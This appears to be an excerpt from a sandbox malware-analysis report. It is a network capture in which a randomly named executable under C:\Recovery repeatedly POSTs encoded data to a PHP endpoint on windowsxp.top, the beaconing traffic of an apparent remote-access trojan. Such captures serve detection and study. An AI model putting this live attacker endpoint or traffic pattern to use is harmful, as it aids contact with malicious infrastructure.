                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1716
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:23:44.758749962 CET  1716  OUT  Data Raw: 55 52 5d 5b 5e 52 53 55 54 58 57 54 54 56 5b 5d 59 5a 5b 5a 52 55 52 58 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: UR][^RSUTXWTTV[]YZ[ZRURXT\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY$&.$"*X#5<\.70^$+/(R>?#T;8<>%.!Y##X(/
                                                                                                                  Oct 27, 2024 19:23:45.000314951 CET  25  IN  HTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:23:45.224514961 CET  917  IN  HTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:23:45 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nDD1jSABsUX1%2FbprVTufmp53Y5UrpGB84qUUuQW9RRCDE7aPBvf2xCXEND46FFQ3DV4jQI45ub2UqlYx5l6DT7WM7DMCizJEjsz1tI5HWox0Xx2G7haraYdT1HqGe1Fz"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b811dfa82e5b-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1314&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2037&delivery_rate=1118146&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 39 38 0d 0a 03 1a 22 5d 37 2e 3f 0c 3d 3f 35 1c 3e 31 32 03 33 3f 2e 04 2c 21 3b 02 2a 04 3a 0f 2d 06 0c 51 24 1a 0b 45 28 07 33 06 20 10 23 0a 2a 0f 21 5e 00 1c 27 14 20 3e 04 09 27 3b 24 5e 33 09 24 5e 35 03 28 04 3d 3d 21 12 2b 00 20 5f 3c 16 2f 50 2f 3f 22 0d 26 2a 3d 02 38 06 26 5f 2b 2a 2a 54 0c 14 21 1f 2e 11 38 5e 21 0f 21 53 3e 54 3c 5b 26 3e 0e 15 27 2a 2c 1e 2b 2c 27 5c 3f 3d 1c 00 20 3c 28 10 28 01 22 5d 33 13 06 04 3e 2e 22 54 22 0e 29 53 0f 30 59 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 98"]7.?=?5>123?.,!;*:-Q$E(3 #*!^' >';$^3$^5(==!+ _</P/?"&*=8&_+**T!.8^!!S>T<[&>'*,+,'\?= <(("]3>."T")S0YP0


                                                                                                                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                                                  70          192.168.2.4  50056        188.114.97.3    80                3512  C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  Timestamp  Bytes transferred  Direction  Data
                                                                                                                  Oct 27, 2024 19:23:45.639895916 CET  321  OUT  POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:23:45.993535995 CET  1012  OUT  Data Raw: 50 51 58 55 5e 59 53 53 54 58 57 54 54 52 5b 5e 59 50 5b 5c 52 55 52 5f 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: PQXU^YSSTXWTTR[^YP[\RUR_T\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY'\&4[!))X!\: \$--(S)<(43X->+=Z5,/!Y##X(
                                                                                                                  Oct 27, 2024 19:23:46.250893116 CET  25  IN  HTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:23:46.571002960 CET  772  IN  HTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:23:46 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hJnV9EUeqhErAYQcHdRcL3NWxpwwYUfg7kd8RcPYdTE3l%2FblPWwgHZ04bh5DyGWDg4WWRPLFi3JAXGw2EPnwPRJUUO%2FwiKnXT4cEUt4nJdKNPAZOh6sugY%2FzNlxSDslU"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b819ab1f2e1e-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1460&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=1124223&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


                                                                                                                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                                                  71          192.168.2.4  50062        188.114.97.3    80                3512  C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  Timestamp  Bytes transferred  Direction  Data
                                                                                                                  Oct 27, 2024 19:23:46.706269979 CET  321  OUT  POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:23:47.055536985 CET  1012  OUT  Data Raw: 50 52 5d 5c 5e 58 53 54 54 58 57 54 54 52 5b 5e 59 50 5b 5b 52 53 52 59 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: PR]\^XSTTXWTTR[^YP[[RSRYT\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY'X&=,"&#%<:,$8W/<T=,4U7#/'_>*^,?!Y##X(
                                                                                                                  Oct 27, 2024 19:23:47.316524982 CET  25  IN  HTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:23:47.515790939 CET  767  IN  HTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:23:47 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HiuZqWx89LOoX5GQxUTFH4RpW4KIcfG2nSvn6eGqn2eLBeRyl7kiG4Hz80eNcaBVnDZbAlVBWCgsAvUjSFrt8IEh%2BZ1bIJ%2FBkcds4aVz1Z7hmFb5P8s8%2F81xlys5pAoI"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b82059c96b4d-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1157&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=1216806&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a
                                                                                                                  Data Ascii: 41R[P
                                                                                                                  Oct 27, 2024 19:23:47.516052961 CET  5  IN  Data Raw: 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 0


                                                                                                                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                                                  72          192.168.2.4  50068        188.114.97.3    80                3512  C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  Timestamp  Bytes transferred  Direction  Data
                                                                                                                  Oct 27, 2024 19:23:47.673482895 CET  321  OUT  POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:23:48.024363995 CET | 1012 | OUT | Data Raw: 50 52 5d 5b 5e 53 56 53 54 58 57 54 54 5c 5b 59 59 5c 5b 50 52 54 52 52 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: PR][^SVSTXWTT\[YY\[PRTRRT\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY'1>'"\%\"5#9'+;=?> P !8,[#)Z=9!Y##X(
                                                                                                                  Oct 27, 2024 19:23:48.276401997 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:23:48.475914001 CET | 768 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:23:48 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RooMJiwpKOmq1knFzCrpuaAOEJ9lk4Av0Ca6bxshnyLlx63G7Vsg1PsQO08U5UKA5e%2FU7kr5w7DkPTR621WDj4sJT6EAxWKIdgiRy381TtcTWZtyEYq1Jo3XWtyrynCe"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b82659500c0b-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1316&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=1113846&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  73 | 192.168.2.4 | 50075 | 188.114.97.3 | 80 | 3512 | C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Oct 27, 2024 19:23:48.699973106 CET | 321 | OUT | POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1008
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:23:49.055764914 CET | 1008 | OUT | Data Raw: 55 53 58 5f 5e 59 53 57 54 58 57 54 54 55 5b 52 59 58 5b 5c 52 52 52 52 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: USX_^YSWTXWTTU[RYX[\RRRRT\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY'['."*9!P$9/%(7,='*<7^-=7Z*5:?!Y##X(
                                                                                                                  Oct 27, 2024 19:23:49.295866966 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:23:49.495891094 CET | 765 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:23:49 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=u9ikecbn8IAETmdtlvX0FfMWUr58XJQBgvSYrGt2DOvh3dAJGs2QtmB00O%2FJHur9c3bl4WsXTddW4KewvA1cwRWgGRLd51Mu1XoaESM6%2FH2B33sn9bKboW9eTdC80mCR"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b82cbee9e781-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1428&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1329&delivery_rate=1130366&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a
                                                                                                                  Data Ascii: 41R[P
                                                                                                                  Oct 27, 2024 19:23:49.495975971 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  74 | 192.168.2.4 | 50080 | 188.114.97.3 | 80 | 3512 | C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Oct 27, 2024 19:23:49.633213043 CET | 321 | OUT | POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:23:49.986319065 CET | 1012 | OUT | Data Raw: 50 52 58 58 5b 5f 56 52 54 58 57 54 54 50 5b 5e 59 50 5b 5f 52 54 52 5d 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: PRXX[_VRTXWTTP[^YP[_RTR]T\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY'Z1=/69%"P4Z:B<\08V;();#2,X??)9!Y##X(7
                                                                                                                  Oct 27, 2024 19:23:50.245431900 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:23:50.445421934 CET | 776 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:23:50 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bu3xCdUMHMxs4zMHUF2Lp2P22SmCLKyWl%2Bazej0Yn%2F4aOxzTuI8auUuKl8YOgSTndzYtcnGG7ybPRDjhS6T%2BTCpvykbO%2FpFsXHbV2bGU5m3%2BMFOIYf2HeItRVrbvuEJF"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b832aefe2c8b-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1407&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=1056163&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  75 | 192.168.2.4 | 50086 | 188.114.97.3 | 80 | 3512 | C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Oct 27, 2024 19:23:50.331048012 CET | 321 | OUT | POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1716
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:23:50.680624962 CET | 1716 | OUT | Data Raw: 50 51 58 59 5b 5b 56 54 54 58 57 54 54 51 5b 59 59 51 5b 5a 52 55 52 5e 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: PQXY[[VTTXWTTQ[YYQ[ZRUR^T\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY'% [ )%^!^9Y$4, U*?771$8-??",?!Y##X(3
                                                                                                                  Oct 27, 2024 19:23:50.928251028 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:23:51.123960018 CET | 922 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:23:51 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=S7iWoLEsVkWnASbfIdRoCN5j4kmyRJAkBuJO%2BR8xoN7t9UkQWA3T32krhU8xnQ7%2B7ublowVMrpJaFd1niUnf1brd4j6N9%2Fp%2BZF5sf20YMVS2JDFDbDlZfk8ZA8KKiTbW"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b836ea388d2d-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1880&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2037&delivery_rate=982360&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 39 38 0d 0a 03 1a 22 5e 34 58 2c 55 29 12 2d 56 3e 31 0c 02 33 02 0f 5d 2f 0c 20 12 3d 2d 3d 1c 2e 06 07 0f 24 42 2a 18 3c 39 2c 5a 23 2d 34 52 29 1f 21 5e 00 1c 27 5c 20 3d 3a 08 31 3b 0e 5e 27 56 23 07 35 03 1e 00 2a 07 3a 0f 3c 29 3c 13 28 38 2b 50 2d 2f 3e 09 31 3a 26 11 3b 16 26 10 2b 00 2a 54 0c 14 22 00 3a 11 20 11 22 32 26 0a 2a 21 27 00 30 00 02 56 27 03 30 55 2b 2f 2b 5f 3c 2e 26 05 22 02 38 58 3c 38 3e 17 27 2d 02 00 2a 04 22 54 22 0e 29 53 0f 30 59 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 98"^4X,U)-V>13]/ =-=.$B*<9,Z#-4R)!^'\ =:1;^'V#5*:<)<(8+P-/>1:&;&+*T": "2&*!'0V'0U+/+_<.&"8X<8>'-*"T")S0YP0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  76 | 192.168.2.4 | 50087 | 188.114.97.3 | 80 | 3512 | C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Oct 27, 2024 19:23:50.614419937 CET | 321 | OUT | POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:23:50.961886883 CET | 1012 | OUT | Data Raw: 55 55 58 59 5e 53 53 50 54 58 57 54 54 54 5b 5b 59 50 5b 50 52 57 52 53 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: UUXY^SSPTXWTTT[[YP[PRWRST\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY'2= _6:9#&-'+3;+8S(/P T</.()):!Y##X('
                                                                                                                  Oct 27, 2024 19:23:51.242623091 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:23:51.434400082 CET | 771 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:23:51 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=V821wQS4RcyZ0kd8AQT6MaK9FU3VbXFO1w03HpPPQg8oKVzqGeu3DGmk4tMeJoqBeh%2BhQsA7CpqotZ5%2F1zTDlr%2BLRPyaTiSlveWjMvWvTp8YPf0Q9p0POkDvleilpR3T"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b838ea15466c-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1781&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=836027&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  77 | 192.168.2.4 | 50090 | 188.114.97.3 | 80 | 3512 | C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Oct 27, 2024 19:23:52.415956974 CET | 321 | OUT | POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:23:52.774441004 CET | 1012 | OUT | Data Raw: 55 57 5d 59 5e 5f 56 57 54 58 57 54 54 53 5b 52 59 5f 5b 5b 52 54 52 5a 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: UW]Y^_VWTXWTTS[RY_[[RTRZT\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY'%>,[":!Y#57.4#%(Q-='*<"!?[,>+*>.!Y##X(;
                                                                                                                  Oct 27, 2024 19:23:53.023951054 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:23:53.228291988 CET | 775 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:23:53 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
